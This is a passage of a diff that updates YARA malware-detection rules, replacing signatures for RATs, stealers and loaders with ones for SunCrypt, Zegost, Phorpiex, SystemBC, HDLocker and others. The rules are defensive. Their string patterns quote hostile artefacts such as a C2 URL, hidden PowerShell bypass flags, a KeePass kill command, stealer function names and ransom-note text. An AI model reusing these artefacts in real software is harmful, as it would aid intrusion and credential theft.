HTTP/1." ascii wide - $c2 = "User-Agent: Mozilla/4.0" ascii wide - $m1 = "winsupdatetw" fullword ascii wide - $m2 = "clientsix" fullword ascii wide - $m3 = "updatethres" fullword ascii wide - $m4 = "uwatchdaemon" fullword ascii wide + $s1 = "ENGINE_get_RAND" ascii + $s2 = "./{IES" fullword ascii + $s3 = "TODO: <Company name>" fullword wide + $s4 = "@Microsoft Corperation. All rights reserved." fullword wide + $s5 = "Microsoft@Windows@Operating System" fullword wide + $x1 = "C:\\Windows\\System32\\rundll32.exe %s,%s %s %s" fullword ascii wide + $x2 = "ASN2_TYPE_new" fullword ascii wide + $x3 = "SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\" fullword ascii wide condition: - uint16(0)==0x5a4d and (3 of ($s*) or ( all of ($c*) and (2 of ($s*) or 1 of ($m*) or 1 of ($p*))) or (1 of ($m*) and 1 of ($s*) and (1 of ($c*) or 1 of ($p*)))) + uint16(0)==0x5a4d and ( all of ($s*) or all of ($x*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Dlagent14 : FILE +rule DITEKSHEN_MALWARE_Win_Suncrypt : FILE { meta: - description = "Detects downloader injector" + description = "Detects SunCrypt ransomware" author = "ditekSHen" - id = "6f80567e-b89a-557d-a282-b61c0b99625e" - date = "2024-09-06" - modified = "2024-09-06" + id = "1a28fcbf-1fc0-5f18-ae71-2e813ed0f958" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L6365-L6378" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "2806b553635dbf96e9c00d3554dd5732df64200b3ae2c4845a2675218bd56387" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4494-L4532" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "abde9bbf2577304ff059972a38e803ba17de7a1f0346efe880a710f2ad79db37" score = 75 - quality = 75 + quality = 73 tags = "FILE" strings: - $s1 = "%ProgramData%\\AVG" fullword wide - $s2 = "%ProgramData%\\AVAST Software" fullword wide - $s3 = "%wS\\%wS.vbs" fullword wide - $s4 = "%wS\\%wS.exe" fullword wide - $s5 = "CL,FR,US,CY,FI,HR,HU,RO,PL,IT,PT,ES,CA,DK,AT,NL,AU,AR,NP,SE,BE,NZ,SK,GR,BG,NO,GE" ascii - $s6 = "= CreateObject(\"Microsoft.XMLHTTP\")" ascii + $s1 = "-noshares" fullword wide + $s2 = "-nomutex" fullword wide + $s3 = "-noreport" fullword wide + $s4 = "-noservices" fullword wide + $s5 = "$Recycle.bin" fullword wide + $s6 = "YOUR_FILES_ARE_ENCRYPTED.HTML" fullword wide + $s7 = "\\\\?\\%c:" fullword wide + $s8 = "locker.exe" fullword ascii + $s9 = "DllRegisterServer" fullword ascii + $g1 = "main.EncFile" fullword ascii nocase + $g2 = "main.detectName" fullword ascii nocase + $g3 = "main.detectIP" fullword ascii nocase + $g4 = "main.detectDebugProc" fullword ascii nocase + $g5 = "main.Bypass" ascii nocase + $g6 = "main.allocateMemory" fullword ascii nocase + $g7 = "main.killAV" fullword ascii nocase + $g8 = "main.disableShadowCopy" fullword ascii nocase + $g9 = "main.(*windowsDrivesModel).LoadDrives" fullword ascii nocase + $g10 = "main.IsFriends" fullword ascii nocase + $g11 = "main.walkMsg" fullword ascii nocase + $g12 = "main.makeSecretMessage" fullword ascii nocase + $g13 = "main.stealFiles" fullword ascii nocase + $g14 = "main.newKey" fullword ascii nocase + $g15 = "main.openBrowser" fullword ascii nocase + $g16 = "main.killProc" fullword ascii nocase + $g17 = "main.selfRemove" fullword ascii nocase + $m1 = "<h2>\\x20Offline\\x20HowTo\\x20</h2>\\x0a\\x09\\x09\\x09\\x09<p>Copy\\x20&\\x20Paste\\x20this\\x20message\\x20to" ascii + $m2 = "\\x20restore\\x20your\\x20files." ascii + $m3 = "\\x20your\\x20documents\\x20and\\x20files\\x20encrypted" ascii + $m4 = "\\x20lose\\x20all\\x20of\\x20your\\x20data\\x20and\\x20files." ascii + $m5 = ",'/#/client/','<h2>\\x20Whats\\x20Happen" ascii condition: - uint16(0)==0x5a4d and 5 of them + uint16(0)==0x5a4d and (5 of ($s*) or 6 of ($g*) or 3 of ($m*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Markirat : FILE +rule DITEKSHEN_MALWARE_Win_Zegost : FILE { meta: - description = "Detects MarkiRAT" + description = "Detects Zegost" author = "ditekSHen" - id = "6cfa276c-a64e-532a-a1ae-11a9e00867bd" - date = "2024-09-06" - modified = "2024-09-06" + id = "cce29602-c096-53df-a99b-16f18ed43b80" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L6380-L6403" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "17b8bcfe8d2b4c87ff8e0bddb436e18029a3b28a5ad3994fe9bef359588d9cad" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4534-L4560" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "96727a0f5c113e5cdfe871f104553fd1c04a8f63ecbb8db7223afb71fcdd4087" score = 75 quality = 75 tags = "FILE" strings: - $pdb = "\\mfcmklg.pdb" ascii - $s1 = "runinhome Completed" wide - $s2 = "ERROR find next file<br>" wide - $s3 = "<br><mark>Hello: %s</mark>" wide - $s4 = "<br><mark>CLIPBOARD[" wide - $s5 = "@userhome@" wide - $s6 = "Global\\{2194ABA1-BFFA-4e6b-8C26-D1BB20190312}" wide - $s7 = "taskkill /im svehost.exe /t /f" fullword ascii - $s8 = "taskkill /im keepass.exe /t /f" fullword ascii - $ba = /bitsadmin \/(addfile|cancel|SetPriority|resume)/ ascii wide - $c1 = "/ech/client.php?u=" wide - $c2 = "/up/uploadx.php?u=" wide - $c3 = "/ech/echo.php?req=rr&u=" wide - $c4 = "/ech/rite.php" wide - $c5 = "http://microsoft.com-view.space/i.php?u=" wide - $c6 = "Content-Disposition: form-data; name=\"uploadedfile\"; filename=\"" ascii + $s1 = "rtvscan.exe" fullword ascii + $s2 = "ashDisp.exe" fullword ascii + $s3 = "KvMonXP.exe" fullword ascii + $s4 = "egui.exe" fullword ascii + $s5 = "avcenter.exe" fullword ascii + $s6 = "K7TSecurity.exe" fullword ascii + $s7 = "TMBMSRV.exe" fullword ascii + $s8 = "RavMonD.exe" fullword ascii + $s9 = "kxetray.exe" fullword ascii + $s10 = "mssecess.exe" fullword ascii + $s11 = "QUHLPSVC.EXE" fullword ascii + $s12 = "360tray.exe" fullword ascii + $s13 = "QQPCRTP.exe" fullword ascii + $s14 = "knsdtray.exe" fullword ascii + $s15 = "V3Svc.exe" fullword ascii + $s16 = "??1_Winit@std@@QAE@XZ" fullword ascii + $s17 = "ClearEventLogA" fullword ascii + $s18 = "SeShutdownPrivilege" fullword ascii + $s19 = "%s\\shell\\open\\command" fullword ascii condition: - uint16(0)==0x5a4d and (($pdb and any of them ) or (5 of ($s*)) or (3 of ($c*)) or ((#ba>3 and 4 of them ))) + uint16(0)==0x5a4d and all of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Klingonrat : FILE +rule DITEKSHEN_MALWARE_Win_GENERIC01 : FILE { meta: - description = "Detects KlingonRAT" + description = "Detects known unamed malicious executables, mostly DLLs" author = "ditekSHen" - id = "bea50bce-b38c-50a0-902a-1014615bd9b8" - date = "2024-09-06" - modified = "2024-09-06" + id = "3c16df71-f2e2-591c-b377-7e5ed697d43f" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L6405-L6427" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "2abfbfc1b67f931f15bfdfd2cd4ba7821e62eb8c518bbc04629c0dd694bbd9c1" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4562-L4575" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "ddae979db5ddda772ca66a3d50e4b5479b16052ea002fd04fdbf295ce784e291" score = 75 quality = 75 tags = "FILE" strings: - $go = "Go build ID:" ascii - $s1 = "/UCRelease/src/client/uac/once/" - $s2 = "%T\\AppData\\Local\\Windows Update\\" - $s3 = "%TSoftware\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\" - $s4 = "wmic /namespace:'\\\\root\\subscription' PATH" - $s5 = "C:\\Windows\\System32\\fodhelper.exeCaption,ParentProcessId,ProcessId" - $s6 = "ldpro.exelsass.exeluall.exeluspt.exe" - $s7 = "scangui.exedeps/lsass.exeetrustcipe.exefile" - $s8 = "alogserv.exeaplica32.exeapvxdwin.exeatro55en.exeautodown.exeavconsol.exeavgserv9.exeavkwctl9.exeavltmain.exeavpdos32.exeavsynmgr.exeavwupd32.exeavwupsrv.exe" - $c1 = "%s/keyLogger?machineId=%s" ascii - $c2 = "%s/stealer?machineId=%s" ascii - $c3 = "%s/lsass?machineId=%s" ascii - $c4 = "%s/logger?machineId=%s" ascii - $c5 = "%s/machineInfo?machineId=%s" ascii - $c6 = "failurehttps://%s:%d/botif-modified-sinceillegal" ascii + $s1 = "\\wmkawe_%d.data" ascii + $s2 = "\\resmon.resmoncfg" ascii + $s3 = "ByPassUAC" fullword ascii + $s4 = "rundll32.exe C:\\ProgramData\\Sandboxie\\SbieMsg.dll,installsvc" fullword ascii nocase + $s5 = "%s\\SbieMsg." ascii + $s6 = "Stupid Japanese" fullword ascii condition: - uint16(0)==0x5a4d and ($go) and (3 of ($c*) or 5 of ($s*) or (3 of ($s*) and 1 of ($c*))) + uint16(0)==0x5a4d and 5 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Xfiles : FILE +rule DITEKSHEN_MALWARE_Win_GENERIC02 : FILE { meta: - description = "Detects X-Files infostealer (formerly BotSh1zoid)" + description = "Detects known unamed malicious executables" author = "ditekSHen" - id = "3f8b2f9b-aa6a-5ffc-95b8-5e44de0d1a49" - date = "2024-09-06" - modified = "2024-09-06" + id = "d0d24e69-0e99-5766-8e8e-9cdce902fa8f" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L6429-L6460" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "0c04a8f019aea36f4bba3ce8289c2d608c69d76bbf321052560b4ca2214be057" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4577-L4591" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "4f750c871ee061ed2d5d1f68e6ac1f56b8127321cfc207e2dd1dbed9d9848ce5" score = 75 - quality = 73 + quality = 25 tags = "FILE" strings: - $x1 = "\\BotSh1zoid\\" ascii - $x2 = "\\BuildPacker.pdb" ascii - $x3 = "\\Svc_host.pdb" ascii nocase - $s1 = "WDefender" fullword ascii - $s2 = "CheckDefender" fullword ascii - $s3 = "RunPS" fullword ascii - $s4 = "DownloadFile" fullword ascii - $v1_1 = "<Pass encoding=\"base64\">(.*)</Pass>" wide - $v1_2 = "Grabber\\" wide - $v1_3 = "/log.php" wide - $v1_4 = /Browsers\\(Logins|Cards|Cookies)/ wide - $v1_5 = "<StealSteam>b__" ascii - $v1_6 = "record_header_field" fullword ascii - $v1_7 = "JavaScreenshotiptReader" fullword ascii - $v1_8 = "HTTPDebuggerPro" wide - $v1_9 = "IEInspector" wide - $v1_10 = "Fiddler" wide - $v2_1 = /get_(Cookie|Logins|Cards)Path/ fullword ascii - $v2_2 = "get_AllScreens" fullword ascii - $v2_3 = "{0}_{1}_{2}.zip" fullword wide - $v2_4 = "\\Stealer" fullword wide - $g1 = "$983a3552-4ec3-4936-bd4a-8e6fd67b4c67" fullword ascii - $g2 = "$a5d9ca4d-400f-4e07-8c09-a916b548f2e3" fullword ascii - $g3 = "$ebc25cf6-9120-4283-b972-0e5520d0000C" fullword ascii + $s1 = "{%s-%d-%d}" fullword wide + $s2 = "update" fullword wide + $s3 = "https://" fullword wide + $s4 = "http://" fullword wide + $s5 = "configure" fullword ascii + $s6 = { 8d 4f 02 e8 8c ff ff ff 8b d8 81 fb 00 dc 00 00 } + $s7 = { 83 c1 02 e8 3c ff ff ff 8b c8 ba ff 03 00 00 8d } condition: - uint16(0)==0x5a4d and ((1 of ($x*) and (3 of ($s*) or 3 of ($v1*) or 3 of ($v2*))) or 7 of ($v1*) or 3 of ($v2*) or (2 of ($g*) and 3 of them )) + uint16(0)==0x5a4d and all of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Allakore : FILE +rule DITEKSHEN_MALWARE_Win_Dlagent06 : FILE { meta: - description = "Detects AllaKore" + description = "Detects known downloader agent downloading encoded binaries in patches" author = "ditekSHen" - id = "371663c1-6faf-5ca3-a79e-e4340d44660b" - date = "2024-09-06" - modified = "2024-09-06" + id = "00cb5184-b12d-5014-bee8-116cc72dfa47" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L6462-L6493" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "0e93682787e27246cdddbd67ca5360728c65049a2e97e71809b5902854aa4bef" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4593-L4610" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "9188804ad0e08f3e0cd09eb8815abea14da5aa28aef9084d19108a24f49f65c7" score = 75 - quality = 73 + quality = 75 tags = "FILE" + snort2_sid = "920122" + snort3_sid = "920119" strings: - $x1 = "AllaKore Remote - Chat" fullword wide - $x2 = "AllaKore Remote - Share Files" fullword wide - $x3 = "CYRUS - Chat" fullword wide - $x4 = "CYRUS - Share Files" fullword wide - $x5 = "<|REDIRECT|><|GETFOLDERS|>" fullword wide - $x6 = "<|REDIRECT|><|DOWNLOADFILE|>" fullword wide - $x7 = "<|REDIRECT|><|WHEELMOUSE|>" fullword wide - $x8 = "<|REDIRECT|><|SETMOUSE" wide - $x9 = "<|CHECKIDPASSWORD|>" fullword wide - $x10 = "<|KEYBOARDSOCKET|>" fullword wide - $x11 = "<|REDIRECT|><|CLIPBOARD|>" fullword wide - $x12 = "<|IDEXISTS!REQUESTPASSWORD|>" fullword wide - $x13 = "<|GETFULLSCREENSHOT|>" fullword wide - $x14 = "<|MAINSOCKET|>" fullword ascii - $s1 = "You can not connect with yourself!" wide - $s2 = "Waiting for authentication..." wide - $s3 = "Connected support!" wide - $s4 = "ID does nor exists." wide - $s5 = "Finding the ID..." wide - $s6 = "PC is Busy!" wide - $s7 = "Upload & Execute" fullword ascii - $s8 = "Download file selected" fullword ascii - $s9 = "CaptureKeys_TimerTimer" fullword ascii - $s10 = "Remote File Manager" fullword ascii + $s1 = "totallist" fullword ascii wide + $s2 = "LINKS_HERE" fullword wide + $s3 = "[SPLITTER]" fullword wide + $var2_1 = "DownloadWeb" fullword ascii + $var2_2 = "WriteByte" fullword ascii + $var2_3 = "MemoryStream" fullword ascii + $var2_4 = "DownloadString" fullword ascii + $var2_5 = "WebClient" fullword ascii condition: - uint16(0)==0x5a4d and (4 of ($x*) or 4 of ($s*) or (3 of ($s*) and 2 of ($x*))) + uint16(0)==0x5a4d and (( all of ($s*) and 2 of ($var2*)) or (4 of ($var2*) and 2 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Reverserat : FILE +rule DITEKSHEN_MALWARE_Win_PWSH_Poshkeylogger { meta: - description = "Detects ReverseRAT" + description = "Detects PowerShell PoshKeylogger" author = "ditekSHen" - id = "df13fc6c-025a-54db-809d-4f3c27b8aa7a" - date = "2024-09-06" - modified = "2024-09-06" + id = "a816d716-caeb-5f08-9043-29db531f9e7c" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L6495-L6514" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "87ab00a5588bfce04ec47a07b184fffe359e472ac8bf561b02a8b070edf2e014" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4612-L4627" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "20bde87ded7e3b68bc554c4b9a6c2ef08514f0d47b6b144763927bede81ea540" score = 75 quality = 75 - tags = "FILE" + tags = "" strings: - $pdb1 = "\\ReverseRat.pdb" ascii nocase - $pdb2 = "\\ReverseRat\\obj\\" ascii nocase - $s1 = "processCmd" fullword ascii - $s2 = "CmdOutputDataHandler" fullword ascii - $s3 = "sendingProcess" fullword ascii - $s4 = "SetStartup" fullword ascii - $s5 = "RunServer" fullword ascii - $s6 = "_OutputDataReceived" ascii - $s7 = { 63 00 6d 00 64 00 2e 00 65 00 78 00 65 00 - 00 03 0a 00 00 13 74 00 65 00 72 00 6d 00 - 69 00 6e 00 61 00 74 00 65 00 00 09 65 00 - 78 00 69 00 74 00 } + $s1 = "::GetKeyboardState" ascii + $s2 = "GetAsyncKeyState(" ascii + $s3 = "::MapVirtualKey(" ascii + $s4 = "::GetAsyncKeyState" ascii + $s5 = "Start-Sleep" ascii + $s6 = "send-mailmessage" ascii + $s7 = "[System.IO.File]::AppendAllText($" ascii + $s8 = "new-object Management.Automation.PSCredential $" ascii condition: - uint16(0)==0x5a4d and ((1 of ($pdb*) and 2 of ($s*)) or 5 of ($s*)) + 6 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Smokeloader : FILE +rule DITEKSHEN_MALWARE_Win_Fujinamarat : FILE { meta: - description = "Detects SmokeLoader variants" + description = "Detects FujinamaRAT" author = "ditekSHen" - id = "e8f28f89-3a79-5d78-8c0a-bad16a57df84" - date = "2024-09-06" - modified = "2024-09-06" + id = "f6b08713-1c03-5914-b0a2-ea9164a3f2cb" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L6516-L6539" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "65c56ed11a3cb4e4bcf8fd2a6be097545cb96e84ba4c4202969d1d163a2a36ed" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4629-L4645" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "42557094afe67196442f46d76f156c09852d694bcc5f03eac51e79ad247c2fdd" score = 75 quality = 75 tags = "FILE" + snort2_sid = "920124" + snort3_sid = "920121" strings: - $x1 = "G2A/CLP/05/RYS" fullword wide - $x2 = "0N1Y/53R10U5/BU51N355" fullword wide - $x3 = "CH4PG3PB-6HT2VI9C-O2NL2NO5-QP1BW0EG" fullword wide - $s1 = "Azure-Update-Task" fullword wide - $s2 = "C:\\Windows\\System32\\schtasks.exe" fullword wide - $s3 = "/C /create /F /sc minute /mo 1 /tn \"" fullword wide - $s4 = "\\Microsoft\\Network" fullword wide - $s5 = "\\Microsoft\\TelemetryServices" fullword wide - $s6 = "\" /tr \"" fullword wide - $e1 = "\\sqlcmd.exe" fullword wide - $e2 = "\\sihost.exe" fullword wide - $e3 = "\\fodhelper.exe" fullword wide + $s1 = "GetAsyncKeyState" fullword ascii + $s2 = "HTTP/1.0" fullword wide + $s3 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" fullword wide + $s4 = "frmMain" fullword ascii + $s5 = "G<=>?@ABGGGGGGGGGGGGGGGGGGGGGGGGGGCDEF" fullword ascii + $s6 = "VBA6.DLL" fullword ascii + $s7 = "t_save" fullword ascii condition: - uint16(0)==0x5a4d and ((1 of ($x*) and 4 of ($s*)) or (5 of ($s*) and 1 of ($e*))) + uint16(0)==0x5a4d and 6 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Dlinjector03 : FILE +rule DITEKSHEN_MALWARE_Win_Phorpiex : FILE { meta: - description = "Detects unknown loader / injector" + description = "Detects Phorpiex variants" author = "ditekSHen" - id = "2d0df2d8-5b1c-5408-b8c7-8ca14d57da0f" - date = "2024-09-06" - modified = "2024-09-06" + id = "e2d26c5f-939e-53e3-8730-622341d26273" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L6541-L6551" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "10092e7916775fe0a39baa5714fdda89f443ceabdcc610cc1fcd5a0fb0e68d0c" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4647-L4666" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "4c48a20aaf37d65471710181238d2c39c1cb0fc5a37b9c411e8d4dcfd7a9e26e" score = 75 - quality = 73 + quality = 75 tags = "FILE" strings: - $x1 = "LOADER ERROR" fullword ascii - $s1 = "_ZN6curlpp10OptionBaseC2E10CURLoption" fullword ascii - $s2 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii + $s1 = "ShEllExECutE=__\\DriveMgr.exe" fullword wide nocase + $s2 = "/c start __ & __\\DriveMgr.exe & exit" fullword wide nocase + $s3 = "%s\\autorun.inf" fullword wide + $s4 = "svchost." wide + $s5 = "%ls\\%d%d" wide + $s6 = "bitcoincash:" ascii + $s7 = "%ls:*:Enabled:%ls" fullword wide + $s8 = "%s\\%s\\DriveMgr.exe" fullword wide + $s9 = "api.wipmania.com" ascii + $v1_1 = "%appdata%" fullword wide + $v1_2 = "(iPhone;" ascii + $v1_3 = "/tst.php" ascii condition: - uint16(0)==0x5a4d and all of them + uint16(0)==0x5a4d and (5 of ($s*) or all of ($v1*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Coinminer02 : FILE +rule DITEKSHEN_MALWARE_Win_EXEPWSH_Dlagent : FILE { meta: - description = "Detects coinmining malware" + description = "Detects SystemBC" author = "ditekSHen" - id = "1878a1b5-4e97-5575-802e-573caded2b3a" - date = "2024-09-06" - modified = "2024-09-06" + id = "f5e7490f-806c-52d2-8f1c-9e00ab3e2780" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L6553-L6571" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "83760aef667819923a2ac67c006e03bb6d4260b7a4aedd691dd5b145fb50d5c1" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4668-L4687" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "6380359db1ac775cea3ebb93f7cf22a92d2f2e634c6aa724e2814c10d4ed42f5" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "%s/%s (Windows NT %lu.%lu" fullword ascii - $s2 = "\\Microsoft\\Libs\\WR64.sys" wide - $s3 = "\\\\.\\WinRing0_" wide - $s4 = "pool_wallet" ascii - $s5 = "cryptonight" ascii - $s6 = "mining.submit" ascii - $c1 = "stratum+ssl://" ascii - $c2 = "daemon+http://" ascii - $c3 = "stratum+tcp://" ascii - $c4 = "socks5://" ascii - $c5 = "losedaemon+https://" ascii + $pwsh = "powershell" fullword ascii + $bitstansfer = "Start-BitsTransfer" ascii wide + $s1 = "GET %s HTTP/1" ascii + $s2 = "User-Agent:" ascii + $s3 = "-WindowStyle Hidden -ep bypass -file \"" fullword ascii + $s4 = "LdrLoadDll" fullword ascii + $v1 = "BEGINDATA" fullword ascii + $v2 = /HOST\d:/ ascii + $v3 = /PORT\d:/ ascii + $v4 = "TOR:" fullword ascii + $v5 = "Fwow64" fullword ascii + $v6 = "start" fullword ascii condition: - uint16(0)==0x5a4d and (3 of ($s*) and 1 of ($c*)) + uint16(0)==0x5a4d and (($pwsh and ($bitstansfer or 2 of ($s*))) or (5 of ($v*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Mercurial : FILE +rule DITEKSHEN_MALWARE_Win_Hdlocker : FILE { meta: - description = "Detects Mercurial infostealer" + description = "Detects HDLocker ransomware" author = "ditekSHen" - id = "c262ada2-01ca-5fc1-adef-987908514019" - date = "2024-09-06" - modified = "2024-09-06" + id = "03ada32b-6ef5-5600-954b-e9f430c6ff2d" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L6573-L6593" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "400f8f717a4e07bf4de508c02bbcd9e82bf21f3df84c989fc622378f33e192f0" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4689-L4703" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "337678a4a780947841a19c401601f1be7218276c8d4161229567dc4d6026b16a" score = 75 - quality = 75 + quality = 50 tags = "FILE" strings: - $x1 = "mercurial grabber" wide nocase - $x2 = "\"text\":\"Mercurial Grabber |" wide - $x3 = "/nightfallgt/mercurial-grabber" wide - $s1 = "/LimerBoy/Adamantium-Thief/" ascii - $s2 = "Mozilla/5.0 (Macintosh; Intel Mac OS X x.y; rv:42.0) Gecko/20100101 Firefox/42.0" fullword wide - $s3 = "StealCookies" fullword ascii - $s4 = "StealPasswords" fullword ascii - $s5 = "DetectDebug" fullword ascii - $s6 = "CaptureScreen" fullword ascii - $s7 = "WebhookContent" fullword ascii - $s8 = /Grab(Token|Product|IP|Hardware)/ fullword ascii - $p1 = "[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27}" fullword ascii wide - $p2 = "mfa\\.[\\w-]{84}" fullword ascii wide + $s1 = "HDLocker_" fullword ascii + $s2 = ".log" fullword ascii + $s3 = "Scripting.FileSystemObject" fullword ascii + $s4 = "Boot" fullword ascii + $s5 = "hellwdo" fullword ascii + $s6 = "blackmoon" fullword ascii + $s7 = "BlackMoon RunTime Error:" ascii condition: - uint16(0)==0x5a4d and (1 of ($x*) or 5 of ($s*) or ( all of ($p*) and 3 of ($s*))) + uint16(0)==0x5a4d and 5 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Phonzy : FILE +rule DITEKSHEN_MALWARE_Win_Vovalex : FILE { meta: - description = "Detects specific downloader agent" + description = "Detects Vovalex ransomware" author = "ditekSHen" - id = "d35f41e4-4633-5482-9ae4-79354463f1b9" - date = "2024-09-06" - modified = "2024-09-06" + id = "967af585-8a91-5ed0-8400-a8a24d95fd12" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L6595-L6608" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "924e7674d76594314df1a32d38f19cee12a3ed49cdf5e153f98bb08a7634055c" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4705-L4718" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "ea695521981f4b007eee50e95f7989dda1f07cc411c59450489bb17391ff29dc" score = 75 quality = 75 tags = "FILE" strings: - $ua1 = "User-Agent: Mozilla/5.0 (X11; Linux" wide - $s1 = "<meta name=\"keywords\" content=\"([\\w\\d ]*)\">" fullword wide - $s2 = "WebClient" 